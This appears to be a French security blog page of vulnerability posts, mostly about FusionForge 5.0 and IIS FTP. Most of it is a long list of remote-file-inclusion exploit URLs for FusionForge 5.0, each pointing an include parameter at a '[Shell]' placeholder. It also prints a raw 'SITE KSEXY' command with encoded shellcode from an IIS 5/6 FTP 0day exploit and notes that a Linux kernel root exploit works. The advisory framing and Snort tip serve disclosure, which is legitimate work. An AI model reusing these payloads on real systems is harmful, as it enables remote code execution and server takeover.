Multiples vulnérabilités RFI pour FusionForge 5.0

cr4wl3r a rapporté de multiples vulnérabilités du type Remote File Inclusion (RFI) pour FusionForge 5.0, qui pourraient permettre à un internaute malveillant de compromettre un système vulnérable.

La liste des pages vulnérables est très longue (voir ci-dessous) et le nombre de paramètres affectés sont aussi assez nombreux. Ces erreurs pourraient permettre d’inclure du code distant et que celui-ci s’exécute dans le contexte du serveur web hébergeant l’application FusionForge 5.0.

Les vulnérabilités ont été rapportées pour la version 5.0, mais d’autres versions pourraient être affectées.

Le nombre de sites web utilisant cet applicatif sont très nombreux que ce soit au niveau international ou uniquement en France. Différents organismes gouvernementaux utilisent cet applicatif, et il est sûr et certain qu’ils seront bientôt la cible de scanner RFI et de tentatives d’exploitations. Une simple requête Google sur le terme “Powered by FusionForge” démontre la quantité énorme de sites web utilisant cet applicatif.

http://shell4u.tk/[path]/common/docman/Document.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/docman/DocumentFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/docman/DocumentGroup.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/forum/Forum.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/forum/ForumsForUser.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/forum/ForumFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/forum/ForumMessage.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/forum/ForumMessageFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/frs/FRSFile.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/frs/FRSPackage.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/frs/FRSRelease.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/MailParser.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/SCMPlugin.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/FusionForge.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/GroupJoinRequest.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/Permission.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/Role.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/session.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/RoleObserver.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/Group.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/System.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/User.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/common/include/system/LDAP.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/system/NSSPGSQL.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/system/pgsql.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/system/UNIX.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/mail/MailingList.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/mail/MailingListFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/import_utils.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectTask.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectCategory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectTaskFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectGroup.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectTasksForUser.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectGroupFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportGroupCum.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportSiteAct.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportUserAdded.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportProjectAct.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportSiteTime.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportUserCum.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportDownloads.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportProjectTime.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportTrackerAct.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportUserTime.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportGroupAdded.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportSetup.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportUserAct.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/TimeEntry.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/scm/SCMFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/ArtifactSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/ForumsSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/ProjectSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/TrackersSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/DocsSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/FrsSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/ExportProjectSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/NewsSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/SkillSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/ForumSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/PeopleSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/TasksSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/survey/SurveyResponse.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/survey/SurveyFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/survey/SurveyResponseFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/survey/SurveyQuestion.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/survey/SurveyQuestionFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/Artifact.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactExtraField.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactFromID.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactQueryFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactTypeFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactExtraFieldElement.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactHistory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/Artifacts.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactTypes.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactBoxOptions.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactMessage.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactsForUser.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactCanned.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactFile.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactType.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/cronjobs/forum_gateway.php?gfwww=[Shell]
http://shell4u.tk/[path]/cronjobs/ftp_create_group_access.php?gfwww=[Shell]
http://shell4u.tk/[path]/cronjobs/send_pending_items_mail.php?gfwww=[Shell]
http://shell4u.tk/[path]/cronjobs/stats_projects-backfill.php?gfwww=[Shell]
http://shell4u.tk/[path]/cronjobs/tracker_gateway.php?gfwww=[Shell]
http://shell4u.tk/[path]/cronjobs/update_filesize.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/aselectextauth/include/ASelectAuthPlugin.class.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/aselectextauth/include/aselectextauth-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/contribtracker/common/contribtracker-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/contribtracker/common/cvssyncmail-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/contribtracker/include/cvssyncmail-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/cvstracker/common/cvstracker-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/eirc/include/eirc-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/eirc/www/eirc.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/externalsearch/include/ExternalHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/externalsearch/include/ExternalSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/externalsearch/include/externalsearch-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/externalsearch/include/ExternalSearchPlugin.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/extratabs/extratabs-init.php?GLOBALS[sys_plugins_path]=[Shell]
http://shell4u.tk/[path]/plugins/fckeditor/common/fckeditor-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/globalsearch/common/globalsearch-init.php?GLOBALS[sys_plugins_path]=[Shell]
http://shell4u.tk/[path]/plugins/helloworld/common/helloworld-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/ldapextauth/include/ldapextauth-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/ldapextauth/include/LdapExtAuthPlugin.class.php?GLOBALS[gfcommon]=[Shell]
http://shell4u.tk/[path]/plugins/mantis/include/mantis-init.php?gfplugins?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/mediawiki/common/mediawiki-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/online_help/common/online_help-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/projectlabels/common/projectlabels-init.phpGLOBALS[sys_plugins_path]=[Shell]
http://shell4u.tk/[path]/plugins/projects_hierarchy/common/projects_hierarchy-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/projects_hierarchy/www/wait_son.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/quota_management/common/quota_management-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/quota_management/www/index.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/quota_management/www/quota.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/quota_management/www/quota_admin.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/quota_management/www/quota_project.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/scmarch/common/scmarch-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmbzr/common/scmbzr-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmccase/common/scmccase-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmcpold/common/scmcpold-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmcvs/common/scmcvs-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmcvs/ftp_create.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/scmdarcs/common/scmdarcs-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmgit/common/scmgit-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmhg/common/scmhg-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmsvn/common/scmsvn-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/svncommitemail/common/svncommitemail-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/svntracker/bin/post.php?gfconfig=[Shell]
http://shell4u.tk/[path]/plugins/svntracker/common/svntracker-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/common/webcalendar-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/activity_log.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/add_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/admin.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/admin_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/adminhome.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/approve_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/assistant_edit.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/assistant_edit_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/availability.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/category.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/category_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/colors.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/datesel.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/day.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/del_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/del_layer.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_entry_handler.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_layer.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_layer_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_nonusers.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_nonusers_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_report.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_report_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_template.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_user.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_user_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/export.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/export_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/group_edit.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/group_edit_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_admin.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_bug.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_edit_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_import.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_index.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_layers.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_pref.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/import.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/import_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/layers.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/layers_toggle.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/list_unapproved.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/month.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/nonusers_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/pref.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/purge.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/reject_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/report.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/search.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/search_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/select_user.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/set_entry_cat.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/users.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/usersel.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_d.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_l.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_m.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_t.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_v.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_w.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/views.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/views_edit.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/views_edit_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/week.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/week_details.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/year.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/wiki/common/WikiGroupSearchEngine.class.php?GLOBALS[gfwww]=[Shell]
http://shell4u.tk/[path]/plugins/wiki/common/WikiSearchEngine.class.php?GLOBALS[gfwww]=[Shell]
http://shell4u.tk/[path]/plugins/wiki/common/WikiHtmlSearchRenderer.class.php?GLOBALS[gfwww]=[Shell]
http://shell4u.tk/[path]/plugins/wiki/common/WikiSearchQuery.class.php?GLOBALS[gfcommon]=[Shell]
http://shell4u.tk/[path]/plugins/wiki/include/WikiGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/wiki/include/WikiSearchEngine.class.php?GLOBALS[gfwww]=[Shell]
http://shell4u.tk/[path]/plugins/wiki/include/WikiHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/wiki/include/WikiSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/utils/fixscripts/tools_data_cleanup.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/index_std.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/docman/include/DocumentGroupHTML.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/forum/admin/ForumAdmin.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/forum/include/AttachManager.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/forum/include/ForumHTML.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/include/stats_function.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/include/user_home.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/include/features_boxes.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/include/note.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/include/pre.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/include/Layout.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/include/project_home.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/admin_ha.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/activity.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/adminhom.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/add_entr.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/approve_.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/admin.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/assistan.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/pm/add_task.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/pm/mod_task.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/pm/browse_task.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/pm/postuploadcsv.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/pm/downloadcsv.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/pm/include/ProjectGroupHTML.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/pm/include/ProjectTaskHTML.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/pm/msproject/msp.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/pm/msproject/xmlparser.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/reporting/timeentry.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/search/include/SearchManager.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/ArtifactSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/FrsGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/TasksGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/DocsGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/GroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/TrackersGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/ForumSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/NewsGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/ForumsGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/AdvancedSearchHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/ForumsHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/HtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/ProjectRssSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/TasksHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/ArtifactHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/FrsHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/NewsHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/RssSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/TrackersHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/DocsHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/FullProjectHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/PeopleHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/ForumHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/HtmlGroupSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/ProjectHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/SkillHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/soap/common/group.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/common/user.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/docman/docman.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/frs/frs.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/pm/pm.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/reporting/timeentry.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/tracker/query.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/tracker/tracker.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/squal/get_session_hash.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/survey/include/SurveyHTML.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/themes/gforge/Theme.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/themes/gforge-classic/Theme.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/themes/gforge-simple-theme/Theme.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/tracker/browse.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/tracker/downloadcsv.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/tracker/query.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/tracker/include/ArtifactFileHtml.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/tracker/include/ArtifactHtml.class.php?gfcommon=[Shell]

IIS5 & 6 FTP Stack Overflow 0day

Kingcope a diffusé, aujourd’hui dans la journée, sur la mailing-list Full Disclosure, un 0Day visant IIS 5 et 6 par le biais du service FTP intégré dans IIS de Windows 2000. Ce 0Day à plusieurs comportements :

– pour IIS 5 sous Windows 2000, l’exploit fournit un accès shell au serveur permettant de le compromettre, mais requiert une authentification quelconque (par exemple anonymous, client d’oeil à Damien ….), et que l’utilisateur FTP puisse créer un répertoire. Difficilement exploitable en anonymous smile.gif

– pour IIS 6 sous Windows 2003, l’exploit permet d’effectuer un déni de service (DoS) sur le serveur web, rendant celui-ci inaccessible. (va y avoir du DoS dans l’air).

#Microsoft Internet Information Server 5.0/6.0
#FTP Server Remote Stack Based Overrun
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8

Pour se protéger de ces tentatives d’exploitation, biensûr ne donner un accès FTP qu’à des utilisateurs de confiance.

Il est aussi possible de détecter cette attaque par le biais de l’IDS Snort avec la règle VRT : (ftp_telnet) FTP command parameters were too long

SITE KSEXY‰âÚÞÙrô[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEU
BXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ
4C1JKCVLKDLPKLKQOELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEX
MYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGC
YBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0BLBOCSE1BLBGCBBOCEBPGPG1BDBME9BN
BIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVV

CVE-2009-2692 : Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit

Tavis Ormandy (ancien responsable de la sécurité chez Gentoo) et Julien Tinnes de “Google Security Team” ont découvert une vulnérabilité locale importante dans le Kernel Linux, toute les versions Kernel Linux 2.4.4 à 2.4.37.4, et 2.6.0 à 2.6.30.4 sont vulnérables.

Un utilisateur local malveillant pourrait par le biais de cette vulnérabilité prendre un contrôle total du système. Quand on voit le nombre de vulnérabilité RFI qui traînent sur Internet, l’on peut imaginer que cette vulnérabilité va faire très très mal dans les jours et semaines qui viennent.

Ce qui est encore plus inquiétant c’est que cette vulnérabilité est présente dans le Kernel Linux depuis près de 8 ans !!! Est-ce que cette vulnérabilité n’a pas été exploitée auparavant, on peut douter que non … si les membres de l’équipe Google Security Team l’ont découverte, d’autres l’ont sûrement aussi découverte.

Une mise à jour a été mise à disposition, afin de combler cette vulnérabilité, par les dévelopeurs du Kernel Linux.

Un exploit est disponible sur Milw0rm depuis le 14 Août, la vidéo ci-dessous et le test que j’ai effectué démontre qu’il fonctionne à merveille (sic.) !

Hijacking Safari 4 Top Sites with Phish Bombs

